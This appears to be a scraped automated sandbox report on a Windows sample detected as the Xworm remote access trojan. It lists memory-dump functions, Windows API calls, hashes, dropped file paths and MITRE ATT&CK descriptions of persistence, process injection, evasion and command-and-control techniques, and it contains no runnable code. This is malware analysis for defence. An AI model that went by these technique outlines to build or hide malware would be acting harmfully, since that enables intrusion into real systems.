Source File: 0000000B.00000002.1976117321.0000027ADED60000.00000040.00000400.00020000.00000000.sdmp, Offset: 0000027ADED60000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_27aded60000_msinfo32.jbxd

Yara matches

Similarity

API ID: ProtectVirtual$LibraryLoad
String ID:
API String ID: 895956442-0
Opcode ID: d24d4ce7223a552c1b01d238479d20a295a89e3d53a7350efd5ba8d12bfb46a0
Instruction ID: afa7d3cbe098c9efaca8f11ddb85e37d16e8f7b5e8a815b39afb7854a43c40d8
Opcode Fuzzy Hash: d24d4ce7223a552c1b01d238479d20a295a89e3d53a7350efd5ba8d12bfb46a0
Instruction Fuzzy Hash: 6831543171CA184BD769BF28986976E73D5E7C8730F1406AAAC8FC32CADD60DD0646C2

Function 0000027ADED70173 Relevance: 6.1, APIs: 4, Instructions: 89
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

VirtualProtect.KERNELBASE ref: 0000027ADED70180
VirtualProtect.KERNELBASE ref: 0000027ADED701A9
VirtualProtect.KERNELBASE ref: 0000027ADED701EE
VirtualProtect.KERNELBASE ref: 0000027ADED70212

Memory Dump Source

Source File: 0000000B.00000002.1976117321.0000027ADED60000.00000040.00000400.00020000.00000000.sdmp, Offset: 0000027ADED60000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_27aded60000_msinfo32.jbxd

Yara matches

Similarity

API ID: ProtectVirtual
String ID:
API String ID: 544645111-0
Opcode ID: f2b484dd179f3dd10506a7a62fe75bc60ed010a6cf5ae84582fe1852291c4020
Instruction ID: a8ca567330a4fe95828815813703903aec7eda558ebb74596c30f5166a05c6d1
Opcode Fuzzy Hash: f2b484dd179f3dd10506a7a62fe75bc60ed010a6cf5ae84582fe1852291c4020
Instruction Fuzzy Hash: 9221333170CA184BDB68BB5CA86936D73D1E7C8720F1401AAED8FC36CADD64DD064682

Function 0000027ADED70F28 Relevance: 4.8, APIs: 3, Instructions: 257
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CLRCreateInstance.MSCOREE ref: 0000027ADED70F74
SysAllocString.OLEAUT32 ref: 0000027ADED71090
SafeArrayDestroy.OLEAUT32 ref: 0000027ADED71174

Memory Dump Source

Source File: 0000000B.00000002.1976117321.0000027ADED60000.00000040.00000400.00020000.00000000.sdmp, Offset: 0000027ADED60000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_27aded60000_msinfo32.jbxd

Yara matches

Similarity

API ID: AllocArrayCreateDestroyInstanceSafeString
String ID:
API String ID: 815377780-0
Opcode ID: dae33ee218254d575b2f885f916d6963ffe40f3360d10ef8a927e24c671039fc
Instruction ID: 7b5188e5aff4a33fa02ede3d11fffb7e37726453ba621d33a355de6f5d6b929b
Opcode Fuzzy Hash: dae33ee218254d575b2f885f916d6963ffe40f3360d10ef8a927e24c671039fc
Instruction Fuzzy Hash: 84815F3021DA488FD768EF28D8997AAB7E0FF99311F04466D949FC7591DF30E9058B82

Function 0000027ADED729B4 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 104
libraryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

LoadLibraryA.KERNELBASE ref: 0000027ADED72A82

Strings

l, xrefs: 0000027ADED72A1C

Memory Dump Source

Source File: 0000000B.00000002.1976117321.0000027ADED60000.00000040.00000400.00020000.00000000.sdmp, Offset: 0000027ADED60000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_27aded60000_msinfo32.jbxd

Yara matches

Similarity

API ID: LibraryLoad
String ID: l
API String ID: 1029625771-2517025534
Opcode ID: 1385f4a438fc17bb376d03bd0145f1e19b120c532c3e81762a8c516170bfbca4
Instruction ID: d8aeb46fc5f03a1e5f90befaf888dd7120a0e8f5f18a129bba0b47de933a5fc0
Opcode Fuzzy Hash: 1385f4a438fc17bb376d03bd0145f1e19b120c532c3e81762a8c516170bfbca4
Instruction Fuzzy Hash: 5A31A37061DAC54FE765EB28C058726BBD5FBA9318F2856ECC0CFC7556DB20D8468702

Function 0000027ADED70230 Relevance: 3.1, APIs: 2, Instructions: 63
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 0000027ADED729B4: LoadLibraryA.KERNELBASE ref: 0000027ADED72A82

VirtualProtect.KERNELBASE ref: 0000027ADED7027E
VirtualProtect.KERNELBASE ref: 0000027ADED702A6

Memory Dump Source

Source File: 0000000B.00000002.1976117321.0000027ADED60000.00000040.00000400.00020000.00000000.sdmp, Offset: 0000027ADED60000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_27aded60000_msinfo32.jbxd

Yara matches

Similarity

API ID: ProtectVirtual$LibraryLoad
String ID:
API String ID: 895956442-0
Opcode ID: b17c4479f7010fd41cbad95f9fb04bd4be79ef02ed8fc175b75ead6b9ebb131e
Instruction ID: c865a29635b01afabf0b196beee028d46f9345e7ffbc22b599acfc634ee96427
Opcode Fuzzy Hash: b17c4479f7010fd41cbad95f9fb04bd4be79ef02ed8fc175b75ead6b9ebb131e
Instruction Fuzzy Hash: E011883171CA084BDBA5FB18989976E77E5FBD8310F4405BAAC8FC7689DE20DD418782

Function 00007FFD9B8C0E15 Relevance: .5, Instructions: 511
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Memory Dump Source

Source File: 0000000B.00000002.1976793205.00007FFD9B8C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_7ffd9b8c0000_msinfo32.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: fb99682fa1fe3cbe67577c69c7d731d47e184d1ea1d8370dfbc98cab651500fd
Instruction ID: 7650eb2442a5a36c7214ee99a3f98501be2af66accf195691212864de3a8e85a
Opcode Fuzzy Hash: fb99682fa1fe3cbe67577c69c7d731d47e184d1ea1d8370dfbc98cab651500fd
Instruction Fuzzy Hash: 34012655B0D6890FE74AAB7858759B87F909F9A740F0A00F7F88CCB2F7DC189A418361

Function 00007FFD9B8C055D Relevance: .3, Instructions: 261
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Memory Dump Source

Source File: 0000000B.00000002.1976793205.00007FFD9B8C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_7ffd9b8c0000_msinfo32.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f4842f653b953f64a6274013a082c926e57d66b7df5fe709193ed5a5239daf4e
Instruction ID: db49c811b3cab923e500a7f05c9119c13e8b0d81a501da46652b7f697d15c98e
Opcode Fuzzy Hash: f4842f653b953f64a6274013a082c926e57d66b7df5fe709193ed5a5239daf4e
Instruction Fuzzy Hash: 1981E861F1EA8E0FE7A9BBB844399B87AA1DF9D780B1504FBD04DC72E7DD1869058301

Function 00007FFD9B8C0949 Relevance: .2, Instructions: 159
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Memory Dump Source

Source File: 0000000B.00000002.1976793205.00007FFD9B8C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_7ffd9b8c0000_msinfo32.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a6c3748f3207f8068d292aa8aaa84f81a77e190d345ff82862a985bfed9aa5b8
Instruction ID: e342605e04c501cccce6242ebd0ce01525eec1c7e156ea072e6a820984c8116b
Opcode Fuzzy Hash: a6c3748f3207f8068d292aa8aaa84f81a77e190d345ff82862a985bfed9aa5b8
Instruction Fuzzy Hash: 1051C6B0F19A8E4FE759EBA88475AB87BB1EF9E740F1501BAD04CC72E7CD2469008711

Function 00007FFD9B8C0AD1 Relevance: .1, Instructions: 130
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Memory Dump Source

Source File: 0000000B.00000002.1976793205.00007FFD9B8C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_7ffd9b8c0000_msinfo32.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 1716232c2a36855a8a30c5d2189fefa65e6217c33d6a362f029aa8831ba43c52
Instruction ID: 52d5a82c4461b7ca14bb095231af6cb51ed164affd6ffba65461ac11b35febc6
Opcode Fuzzy Hash: 1716232c2a36855a8a30c5d2189fefa65e6217c33d6a362f029aa8831ba43c52
Instruction Fuzzy Hash: 90310561F189490FEB84BBAC58697BC77E2EF9C715F0502B7E01DC32D6DE2868018392

Function 00007FFD9B8C0849 Relevance: .1, Instructions: 108
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Memory Dump Source

Source File: 0000000B.00000002.1976793205.00007FFD9B8C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_7ffd9b8c0000_msinfo32.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f532b054384532631f8465e6493bbcd344fd53107ed06fdd0c361c5c254ed8d8
Instruction ID: 0750eaa390d2147015d8ced443a99b25b893db079a77ca04f6d6b71f8d1d3a55
Opcode Fuzzy Hash: f532b054384532631f8465e6493bbcd344fd53107ed06fdd0c361c5c254ed8d8
Instruction Fuzzy Hash: 02317E20B1C9494FEB88EF6C846A778B2C2EF9D301F0545BEA04EC72E7DE289C418741

Function 00007FFD9B8C07D6 Relevance: .1, Instructions: 55
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Memory Dump Source

Source File: 0000000B.00000002.1976793205.00007FFD9B8C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_7ffd9b8c0000_msinfo32.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a4244e99c4bb3ff34c9bda687186cb2bcdcb3ccf264dca8ab82b24a6881da471
Instruction ID: 62694c23fb2af2844bc25d28451d78c183eacbddb78f407215999349ce5b10eb
Opcode Fuzzy Hash: a4244e99c4bb3ff34c9bda687186cb2bcdcb3ccf264dca8ab82b24a6881da471
Instruction Fuzzy Hash: FF01F94250F6C21FD79756B84CA95A23FE9CE9756470E00F7E588CA163D84D1807C3A2

Function 00007FFD9B8C0120 Relevance: .0, Instructions: 30
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Memory Dump Source

Source File: 0000000B.00000002.1976793205.00007FFD9B8C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_7ffd9b8c0000_msinfo32.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 462b14af29d0ceb35d14b6ab462d2639804089b3ead96f2e03c5507bbeda40d2
Instruction ID: 7a48f5f5e0f6e8b54e514c146ce589c7e1a3872da8045b9c3e8705f7f9913737
Opcode Fuzzy Hash: 462b14af29d0ceb35d14b6ab462d2639804089b3ead96f2e03c5507bbeda40d2
Instruction Fuzzy Hash: AFE0DF93A2A8191AE2B8659D0CA98720B9DDFE99D972A0477B15EC22A2EC44280245C1

Description:	Adversaries may abuse Windows Management Instrumentation (WMI) to execute malicious commands and payloads. WMI is an administration feature that provides a uniform environment to access Windows system components. The WMI service enables both local and remote access, though the latter is facilitated by Remote Services such as Distributed Component Object Model (DCOM) and Windows Remote Management (WinRM).Remote WMI over DCOM operates using port 135, whereas WMI over WinRM operates over port 5985 when using HTTP and 5986 for HTTPS.
Tactics:	Execution
Data Sources:	Command: Command Execution, Network Traffic: Network Connection Creation, Process: Process Creation, WMI: WMI Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may achieve persistence by adding a program to a startup folder or referencing it with a Registry run key. Adding an entry to the "run keys" in the Registry or startup folder will cause the program referenced to be executed when a user logs in.These programs will be executed under the context of the user and will have the account's associated permissions level.
Tactics:	Persistence, Privilege Escalation
Data Sources:	Command: Command Execution, File: File Modification, Process: Process Creation, Windows Registry: Windows Registry Key Creation, Windows Registry: Windows Registry Key Modification
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may execute their own malicious payloads by side-loading DLLs. Similar to DLL Search Order Hijacking , side-loading involves hijacking which DLL a program loads. But rather than just planting the DLL within the search order of a program then waiting for the victim application to be invoked, adversaries may directly side-load their payloads by planting then invoking a legitimate application that executes their payload(s).
Tactics:	Defense Evasion, Persistence, Privilege Escalation
Data Sources:	File: File Creation, File: File Modification, Module: Module Load, Process: Process Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	File: File Metadata, File: File Modification, Module: Module Load, Process: OS API Execution, Process: Process Access, Process: Process Metadata, Process: Process Modification
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Masquerading occurs when the name or location of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Metadata, File: File Modification, Image: Image Metadata, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, Scheduled Job: Scheduled Job Metadata, Scheduled Job: Scheduled Job Modification, Service: Service Creation, Service: Service Metadata
Platforms:	Containers, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify and/or disable security tools to avoid possible detection of their malware/tools and activities. This may take many forms, such as killing security software processes or services, modifying / deleting Registry keys or configuration files so that tools do not operate properly, or other methods to interfere with security tools scanning or reporting information. Adversaries may also disable updates to prevent the latest security patches from reaching tools on victim systems.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, Driver: Driver Load, Process: Process Creation, Process: Process Termination, Sensor Health: Host Status, Service: Service Metadata, Windows Registry: Windows Registry Key Deletion, Windows Registry: Windows Registry Key Modification
Platforms:	Containers, IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use Obfuscated Files or Information to hide artifacts of an intrusion from analysis. They may require separate mechanisms to decode or deobfuscate that information depending on how they intend to use it. Methods for doing that include built-in functionality of malware or by using utilities present on the system.
Tactics:	Defense Evasion
Data Sources:	File: File Modification, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Creation, File: File Metadata, Module: Module Load, Process: OS API Execution, Process: Process Creation, Script: Script Execution, WMI: WMI Creation, Windows Registry: Windows Registry Key Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may perform software packing or virtual machine software protection to conceal their code. Software packing is a method of compressing or encrypting an executable. Packing an executable changes the file signature in an attempt to avoid signature-based detection. Most decompression techniques decompress the executable code in memory. Virtual machine software protection translates an executable's original code into a special format that only a special virtual machine can run. A virtual machine is then called to run this code.
Tactics:	Defense Evasion
Data Sources:	File: File Metadata
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may gather the system time and/or time zone from a local or remote system. The system time is set and stored by the Windows Time Service within a domain to maintain time synchronization between systems and services in an enterprise network.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of security software, configurations, defensive tools, and sensors that are installed on a system or in a cloud environment. This may include things such as firewall rules and anti-virus. Adversaries may use the information from Security Software Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Firewall: Firewall Enumeration, Firewall: Firewall Metadata, Process: OS API Execution, Process: Process Creation
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Creation, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using a protocol and port pairing that are typically not associated. For example, HTTPS over port 8088or port 587as opposed to the traditional port 443. Adversaries may make changes to the standard port used by a protocol to bypass filtering or muddle analysis/parsing of network data.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may transfer tools or other files from an external system into a compromised environment. Tools or files may be copied from an external adversary-controlled system to the victim network through the command and control channel or through alternate protocols such as ftp . Once present, adversaries may also transfer/spread tools between victim devices within a compromised environment (i.e. Lateral Tool Transfer ).
Tactics:	Command and Control
Data Sources:	Command: Command Execution, File: File Creation, Network Traffic: Network Connection Creation, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use an OSI non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using OSI application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report SecuriteInfo.com.Heur.Mint.Phil.57.5869.22404.exe

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Threat Intel

Malware Configuration

Threatname: Xworm

Yara Signatures

Memory Dumps

Unpacked PEs

Sigma Signatures

System Summary

Suricata Signatures

Joe Sandbox Signatures

AV Detection

Compliance

Networking

System Summary

Data Obfuscation

Persistence and Installation Behavior

Boot Survival

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Lowering of HIPS / PFW / Operating System Security Settings

Stealing of Sensitive Information

Remote Access Functionality

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

World Map of Contacted IPs

Public IPs

General Information

Warnings

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

C:\Users\user\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\msinfo32.exe.log

C:\Users\user\AppData\Roaming\qNl6oqz9\FRpl.exe

C:\Users\user\AppData\Roaming\qNl6oqz9\FRpl.exe:Zone.Identifier

Static File Info

General

File Icon

Static PE Info

General

Entrypoint Preview

Data Directories

Sections

Imports

Network Behavior

Suricata IDS Alerts

Windows Analysis Report
SecuriteInfo.com.Heur.Mint.Phil.57.5869.22404.exe

Function 002AB6F0 Relevance: 14.4, APIs: 7, Strings: 1, Instructions: 373
COMMON

Function 00291180 Relevance: 12.2, APIs: 8, Instructions: 205
sleepstringCOMMON

Function 00298820 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 112
threadCOMMON

Function 002A1956 Relevance: 7.6, APIs: 4, Strings: 1, Instructions: 119
COMMON

Function 002ABAA0 Relevance: 6.1, APIs: 4, Instructions: 97
COMMON

Function 002CF130 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 142
COMMON

Function 002CEC40 Relevance: 2.7, APIs: 2, Instructions: 208
COMMON

Function 002AC2E0 Relevance: 1.4, APIs: 1, Instructions: 112
COMMON

Function 002AC40D Relevance: 1.3, APIs: 1, Instructions: 60
COMMON

Function 002CDBB0 Relevance: 1.3, APIs: 1, Instructions: 58
COMMON

Function 00293444 Relevance: 1.3, APIs: 1, Instructions: 32
COMMON